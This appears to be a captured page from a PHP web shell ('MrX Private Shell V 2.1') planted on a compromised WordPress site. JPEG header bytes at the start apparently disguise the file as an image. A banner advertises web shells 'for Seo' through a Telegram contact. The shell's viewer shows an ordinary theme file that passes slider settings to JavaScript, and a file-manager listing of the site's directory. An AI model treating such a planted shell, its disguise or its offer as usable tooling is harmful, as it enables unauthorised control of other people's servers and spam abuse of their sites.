����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/***
* Custom Slider Parameters
*
* Passing Variables from custom Theme Options to the javascript files
* of featured content slider.
*
*/
if ( ! defined( 'ABSPATH' ) ) {
exit; // Exit if accessed directly.
}
// Passing Variables to Featured Content Slider ( js/slider.js)
add_action('wp_enqueue_scripts', 'pmthemes_custom_jscript_slider');
if ( ! function_exists( 'pmthemes_custom_jscript_slider' ) ):
function pmthemes_custom_jscript_slider() {
// Get Theme Options from Database
$theme_options = pmthemes_theme_options();
// Set Parameters array
$params = array();
// Define Slider Animation
if( isset($theme_options['slider_animation']) ) :
$params['animation'] = esc_js($theme_options['slider_animation']);
endif;
// Passing Parameters to Javascript
wp_localize_script( 'pmthemes-jquery-frontpage_slider', 'pmthemes_slider_params', $params );
}
endif;| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| .htaccess | File | 0 B | 0644 |
|
| slider.php | File | 926 B | 0644 |
|